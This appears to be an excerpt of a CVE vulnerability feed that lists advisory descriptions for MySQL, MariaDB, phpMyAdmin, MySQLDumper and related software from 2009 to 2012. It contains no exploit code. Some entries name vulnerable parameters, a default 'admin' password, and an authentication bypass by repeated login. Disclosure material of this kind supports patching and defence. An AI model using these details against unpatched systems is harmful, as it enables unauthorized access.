20357| [CVE-2012-4452] MySQL 5.0.88, and possibly other versions and platforms, allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of a CVE-2009-4030 regression, which was not omitted in other packages and versions such as MySQL 5.0.95 in Red Hat Enterprise Linux 6.
20358| [CVE-2012-4414] Multiple SQL injection vulnerabilities in the replication code in Oracle MySQL possibly before 5.5.29, and MariaDB 5.1.x through 5.1.62, 5.2.x through 5.2.12, 5.3.x through 5.3.7, and 5.5.x through 5.5.25, allow remote authenticated users to execute arbitrary SQL commands via vectors related to the binary log. NOTE: as of 20130116, Oracle has not commented on claims from a downstream vendor that the fix in MySQL 5.5.29 is incomplete.
20359| [CVE-2012-4255] MySQLDumper 1.24.4 allows remote attackers to obtain sensitive information via a direct request to learn/cubemail/refresh_dblist.php, which reveals the installation path in an error message.
20360| [CVE-2012-4254] MySQLDumper 1.24.4 allows remote attackers to obtain sensitive information (Notices) via a direct request to (1) learn/cubemail/restore.php or (2) learn/cubemail/dump.php.
20361| [CVE-2012-4253] Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
20362| [CVE-2012-4252] Multiple cross-site request forgery (CSRF) vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to hijack the authentication of administrators for requests that (1) remove file access restriction via a deletehtaccess action, (2) drop a database via a kill value in a db action, (3) uninstall the application via a 101 value in the phase parameter to learn/cubemail/install.php, (4) delete config.php via a 2 value in the phase parameter to learn/cubemail/install.php, (5) change a password via a schutz action, or (6) execute arbitrary SQL commands via the sql_statement parameter to learn/cubemail/sql.php.
20363| [CVE-2012-4251] Multiple cross-site scripting (XSS) vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter to index.php, (2) phase parameter to install.php, (3) tablename or (4) dbid parameter to sql.php, or (5) filename parameter to restore.php in learn/cubemail/.
20364| [CVE-2012-3951] The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session.
20365| [CVE-2012-3441] The database creation script (module/idoutils/db/scripts/create_mysqldb.sh) in Icinga 1.7.1 grants access to all databases to the icinga user, which allows icinga users to access other databases via unspecified vectors.
20366| [CVE-2012-3197] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
20367| [CVE-2012-3180] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20368| [CVE-2012-3177] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server.
20369| [CVE-2012-3173] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB Plugin.
20370| [CVE-2012-3167] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Full Text Search.
20371| [CVE-2012-3166] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
20372| [CVE-2012-3163] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
20373| [CVE-2012-3160] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows local users to affect confidentiality via unknown vectors related to Server Installation.
20374| [CVE-2012-3158] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Protocol.
20375| [CVE-2012-3156] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server.
20376| [CVE-2012-3150] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20377| [CVE-2012-3149] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote authenticated users to affect confidentiality, related to MySQL Client.
20378| [CVE-2012-3147] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote attackers to affect integrity and availability, related to MySQL Client.
20379| [CVE-2012-3144] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server.
20380| [CVE-2012-2750] Unspecified vulnerability in MySQL 5.5.x before 5.5.23 has unknown impact and attack vectors related to a "Security Fix", aka Bug #59533. NOTE: this might be a duplicate of CVE-2012-1689, but as of 20120816, Oracle has not commented on this possibility.
20381| [CVE-2012-2749] MySQL 5.1.x before 5.1.63 and 5.5.x before 5.5.24 allows remote authenticated users to cause a denial of service (mysqld crash) via vectors related to incorrect calculation and a sort order index.
20382| [CVE-2012-2122] sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
20383| [CVE-2012-2102] MySQL 5.1.x before 5.1.62 and 5.5.x before 5.5.22 allows remote authenticated users to cause a denial of service (assertion failure and mysqld abort) by deleting a record and using HANDLER READ NEXT.
20384| [CVE-2012-1757] Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
20385| [CVE-2012-1756] Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors.
20386| [CVE-2012-1735] Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20387| [CVE-2012-1734] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20388| [CVE-2012-1705] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20389| [CVE-2012-1703] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20390| [CVE-2012-1702] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote attackers to affect availability via unknown vectors.
20391| [CVE-2012-1697] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.21 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition.
20392| [CVE-2012-1696] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.19 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20393| [CVE-2012-1690] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20394| [CVE-2012-1689] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.22 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20395| [CVE-2012-1688] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability, related to Server DML.
20396| [CVE-2012-0937] ** DISPUTED ** wp-admin/setup-config.php in the installation component in WordPress 3.3.1 and earlier does not limit the number of MySQL queries sent to external MySQL database servers, which allows remote attackers to use WordPress as a proxy for brute-force attacks or denial of service attacks via the dbhost parameter, a different vulnerability than CVE-2011-4898. NOTE: the vendor disputes the significance of this issue because an incomplete WordPress installation might be present on the network for only a short time.
20397| [CVE-2012-0882] Buffer overflow in yaSSL, as used in MySQL 5.5.20 and possibly other versions including 5.5.x before 5.5.22 and 5.1.x before 5.1.62, allows remote attackers to execute arbitrary code via unspecified vectors, as demonstrated by VulnDisco Pack Professional 9.17. NOTE: as of 20120224, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. NOTE: due to lack of details, it is not clear whether this issue is a duplicate of CVE-2012-0492 or another CVE.
20398| [CVE-2012-0583] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.60 and earlier, and 5.5.19 and earlier, allows remote authenticated users to affect availability, related to MyISAM.
20399| [CVE-2012-0578] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
20400| [CVE-2012-0574] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors.
20401| [CVE-2012-0572] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
20402| [CVE-2012-0553] Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5.x before 5.5.28, has unspecified impact and attack vectors, a different vulnerability than CVE-2013-1492.
20403| [CVE-2012-0540] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier and 5.5.23 and earlier allows remote authenticated users to affect availability, related to GIS Extension.
20404| [CVE-2012-0496] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
20405| [CVE-2012-0495] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, and CVE-2012-0493.
20406| [CVE-2012-0494] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows local users to affect availability via unknown vectors.
20407| [CVE-2012-0493] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, and CVE-2012-0495.
20408| [CVE-2012-0492] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0485.
20409| [CVE-2012-0491] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0493, and CVE-2012-0495.
20410| [CVE-2012-0490] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect availability via unknown vectors.
20411| [CVE-2012-0489] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
20412| [CVE-2012-0488] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
20413| [CVE-2012-0487] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
20414| [CVE-2012-0486] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
20415| [CVE-2012-0485] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0492.
20416| [CVE-2012-0484] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect confidentiality via unknown vectors.
20417| [CVE-2012-0120] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0485, and CVE-2012-0492.
20418| [CVE-2012-0119] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
20419| [CVE-2012-0118] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0113.
20420| [CVE-2012-0117] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
20421| [CVE-2012-0116] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
20422| [CVE-2012-0115] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
20423| [CVE-2012-0114] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows local users to affect confidentiality and integrity via unknown vectors.
20424| [CVE-2012-0113] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0118.
20425| [CVE-2012-0112] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
20426| [CVE-2012-0102] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0101.
20427| [CVE-2012-0101] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0102.
20428| [CVE-2012-0087] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0101 and CVE-2012-0102.
20429| [CVE-2012-0075] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect integrity via unknown vectors.
20430| [CVE-2011-5049] MySQL 5.5.8, when running on Windows, allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted packet to TCP port 3306.
20431| [CVE-2011-4959] SQL injection vulnerability in the addslashes method in SilverStripe 2.3.x before 2.3.12 and 2.4.x before 2.4.6, when connected to a MySQL database using far east character encodings, allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
20432| [CVE-2011-4899] ** DISPUTED ** wp-admin/setup-config.php in the installation component in WordPress 3.3.1 and earlier does not ensure that the specified MySQL database service is appropriate, which allows remote attackers to configure an arbitrary database via the dbhost and dbname parameters, and subsequently conduct static code injection and cross-site scripting (XSS) attacks via (1) an HTTP request or (2) a MySQL query. NOTE: the vendor disputes the significance of this issue
20433| [CVE-2011-4898] ** DISPUTED ** wp-admin/setup-config.php in the installation component in WordPress 3.3.1 and earlier generates different error messages for requests lacking a dbname parameter depending on whether the MySQL credentials are valid, which makes it easier for remote attackers to conduct brute-force attacks via a series of requests with different uname and pwd parameters. NOTE: the vendor disputes the significance of this issue
20434| [CVE-2011-3989] SQL injection vulnerability in DBD::mysqlPP 0.04 and earlier allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
20435| [CVE-2011-3805] TaskFreak! multi-mysql-0.6 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by include/language/zh/register_info.php and certain other files.
20436| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
20437| [CVE-2011-2531] Prosody 0.8.x before 0.8.1, when MySQL is used, assigns an incorrect data type to the value column in certain tables, which might allow remote attackers to cause a denial of service (data truncation) by sending a large amount of data.
20438| [CVE-2011-2262] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote attackers to affect availability via unknown vectors.
20439| [CVE-2011-1906] Trustwave WebDefend Enterprise before 5.0 7.01.903-1.4 stores specific user-account credentials in a MySQL database, which makes it easier for remote attackers to read the event collection table via requests to the management port, a different vulnerability than CVE-2011-0756.
20440| [CVE-2011-1513] Static code injection vulnerability in install_.php in e107 CMS 0.7.24 and probably earlier versions, when the installation script is not removed, allows remote attackers to inject arbitrary PHP code into e107_config.php via a crafted MySQL server name.
20441| [CVE-2011-0432] Multiple SQL injection vulnerabilities in the get_userinfo method in the MySQLAuthHandler class in DAVServer/mysqlauth.py in PyWebDAV before 0.9.4.1 allow remote attackers to execute arbitrary SQL commands via the (1) user or (2) pw argument. NOTE: some of these details are obtained from third party information.
20442| [CVE-2010-5104] The escapeStrForLike method in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5 does not properly escape input when the MySQL database is set to sql_mode NO_BACKSLASH_ESCAPES, which allows remote attackers to obtain sensitive information via wildcard characters in a LIKE query.
20443| [CVE-2010-4822] core/model/MySQLDatabase.php in SilverStripe 2.4.x before 2.4.4, when the site is running in "live mode," allows remote attackers to obtain the SQL queries for a page via the showqueries and ajax parameters.
20444| [CVE-2010-4700] The set_magic_quotes_runtime function in PHP 5.3.2 and 5.3.3, when the MySQLi extension is used, does not properly interact with use of the mysqli_fetch_assoc function, which might make it easier for context-dependent attackers to conduct SQL injection attacks via crafted input that had been properly handled in earlier PHP versions.
20445| [CVE-2010-3840] The Gis_line_string::init_from_wkb function in sql/spatial.cc in MySQL 5.1 before 5.1.51 allows remote authenticated users to cause a denial of service (server crash) by calling the PolyFromWKB function with Well-Known Binary (WKB) data containing a crafted number of (1) line strings or (2) line points.
20446| [CVE-2010-3839] MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (infinite loop) via multiple invocations of a (1) prepared statement or (2) stored procedure that creates a query with nested JOIN statements.
20447| [CVE-2010-3838] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a query that uses the (1) GREATEST or (2) LEAST function with a mixed list of numeric and LONGBLOB arguments, which is not properly handled when the function's result is "processed using an intermediate temporary table."
20448| [CVE-2010-3837] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a prepared statement that uses GROUP_CONCAT with the WITH ROLLUP modifier, probably triggering a use-after-free error when a copied object is modified in a way that also affects the original object.
20449| [CVE-2010-3836] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (assertion failure and server crash) via vectors related to view preparation, pre-evaluation of LIKE predicates, and IN Optimizers.
20450| [CVE-2010-3835] MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (mysqld server crash) by performing a user-variable assignment in a logical expression that is calculated and stored in a temporary table for GROUP BY, then causing the expression value to be used after the table is created, which causes the expression to be re-evaluated instead of accessing its value from the table.
20451| [CVE-2010-3834] Unspecified vulnerability in MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via vectors related to "materializing a derived table that required a temporary table for grouping" and "user variable assignments."
20452| [CVE-2010-3833] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 does not properly propagate type errors, which allows remote attackers to cause a denial of service (server crash) via crafted arguments to extreme-value functions such as (1) LEAST and (2) GREATEST, related to KILL_BAD_DATA and a "CREATE TABLE ... SELECT."
20453| [CVE-2010-3683] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 sends an OK packet when a LOAD DATA INFILE request generates SQL errors, which allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a crafted request.
20454| [CVE-2010-3682] Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using EXPLAIN with crafted "SELECT ... UNION ... ORDER BY (SELECT ... WHERE ...)" statements, which triggers a NULL pointer dereference in the Item_singlerow_subselect::store function.
20455| [CVE-2010-3681] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using the HANDLER interface and performing "alternate reads from two indexes on a table," which triggers an assertion failure.
20456| [CVE-2010-3680] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by creating temporary tables with nullable columns while using InnoDB, which triggers an assertion failure.
20457| [CVE-2010-3679] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via certain arguments to the BINLOG command, which triggers an access of uninitialized memory, as demonstrated by valgrind.
20458| [CVE-2010-3678] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (crash) via (1) IN or (2) CASE operations with NULL arguments that are explicitly specified or indirectly provided by the WITH ROLLUP modifier.
20459| [CVE-2010-3677] Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a join query that uses a table with a unique SET column.
20460| [CVE-2010-3676] storage/innobase/dict/dict0crea.c in mysqld in Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (assertion failure) by modifying the (1) innodb_file_format or (2) innodb_file_per_table configuration parameters for the InnoDB storage engine, then executing a DDL statement.
20461| [CVE-2010-3064] Stack-based buffer overflow in the php_mysqlnd_auth_write function in the Mysqlnd extension in PHP 5.3 through 5.3.2 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) username or (2) database name argument to the (a) mysql_connect or (b) mysqli_connect function.
20462| [CVE-2010-3063] The php_mysqlnd_read_error_from_line function in the Mysqlnd extension in PHP 5.3 through 5.3.2 does not properly calculate a buffer length, which allows context-dependent attackers to trigger a heap-based buffer overflow via crafted inputs that cause a negative length value to be used.
20463| [CVE-2010-3062] mysqlnd_wireprotocol.c in the Mysqlnd extension in PHP 5.3 through 5.3.2 allows remote attackers to (1) read sensitive memory via a modified length value, which is not properly handled by the php_mysqlnd_ok_read function
20464| [CVE-2010-3056] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 2.11.x before 2.11.10.1 and 3.x before 3.3.5.1 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) db_search.php, (2) db_sql.php, (3) db_structure.php, (4) js/messages.php, (5) libraries/common.lib.php, (6) libraries/database_interface.lib.php, (7) libraries/dbi/mysql.dbi.lib.php, (8) libraries/dbi/mysqli.dbi.lib.php, (9) libraries/db_info.inc.php, (10) libraries/sanitizing.lib.php, (11) libraries/sqlparser.lib.php, (12) server_databases.php, (13) server_privileges.php, (14) setup/config.php, (15) sql.php, (16) tbl_replace.php, and (17) tbl_sql.php.
20465| [CVE-2010-2008] MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
20466| [CVE-2010-2003] Cross-site scripting (XSS) vulnerability in misc/get_admin.php in Advanced Poll 2.08 allows remote attackers to inject arbitrary web script or HTML via the mysql_host parameter.
20467| [CVE-2010-1865] Multiple SQL injection vulnerabilities in ClanSphere 2009.0.3 and earlier allow remote attackers to execute arbitrary SQL commands via (1) the IP address to the cs_getip function in generate.php in the Captcha module, or (2) the s_email parameter to the cs_sql_select function in the MySQL database driver (mysql.php).
20468| [CVE-2010-1850] Buffer overflow in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote authenticated users to execute arbitrary code via a COM_FIELD_LIST command with a long table name.
20469| [CVE-2010-1849] The my_net_skip_rest function in sql/net_serv.cc in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote attackers to cause a denial of service (CPU and bandwidth consumption) by sending a large number of packets that exceed the maximum length.
20470| [CVE-2010-1848] Directory traversal vulnerability in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote authenticated users to bypass intended table grants to read field definitions of arbitrary tables, and on 5.1 to read or delete content of arbitrary tables, via a .. (dot dot) in a table name.
20471| [CVE-2010-1626] MySQL before 5.1.46 allows local users to delete the data and index files of another user's MyISAM table via a symlink attack in conjunction with the DROP TABLE command, a different vulnerability than CVE-2008-4098 and CVE-2008-7247.
20472| [CVE-2010-1621] The mysql_uninstall_plugin function in sql/sql_plugin.cc in MySQL 5.1 before 5.1.46 does not check privileges before uninstalling a plugin, which allows remote attackers to uninstall arbitrary plugins via the UNINSTALL PLUGIN command.
20473| [CVE-2010-1583] SQL injection vulnerability in the loadByKey function in the TznDbConnection class in tzn_mysql.php in Tirzen (aka TZN) Framework 1.5, as used in TaskFreak! before 0.6.3, allows remote attackers to execute arbitrary SQL commands via the username field in a login action.
20474| [CVE-2010-0336] Unspecified vulnerability in the kiddog_mysqldumper (kiddog_mysqldumper) extension 0.0.3 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown attack vectors.
20475| [CVE-2010-0124] Employee Timeclock Software 0.99 places the database password on the mysqldump command line, which allows local users to obtain sensitive information by listing the process.
20476| [CVE-2009-5026] The executable comment feature in MySQL 5.0.x before 5.0.93 and 5.1.x before 5.1.50, when running in certain slave configurations in which the slave is running a newer version than the master, allows remote attackers to execute arbitrary SQL commands via custom comments.
20477| [CVE-2009-4833] MySQL Connector/NET before 6.0.4, when using encryption, does not verify SSL certificates during connection, which allows remote attackers to perform a man-in-the-middle attack with a spoofed SSL certificate.
20478| [CVE-2009-4484] Multiple stack-based buffer overflows in the CertDecoder::GetName function in src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld in MySQL 5.0.x before 5.0.90, MySQL 5.1.x before 5.1.43, MySQL 5.5.x through 5.5.0-m2, and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption and daemon crash) by establishing an SSL connection and sending an X.509 client certificate with a crafted name field, as demonstrated by mysql_overflow1.py and the vd_mysql5 module in VulnDisco Pack Professional 8.11. NOTE: this was originally reported for MySQL 5.0.51a.
20479| [CVE-2009-4030] MySQL 5.1.x before 5.1.41 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079.
20480| [CVE-2009-4028] The vio_verify_callback function in viosslfactories.c in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used, accepts a value of zero for the depth of X.509 certificates, which allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL servers via a crafted certificate, as demonstrated by a certificate presented by a server linked against the yaSSL library.
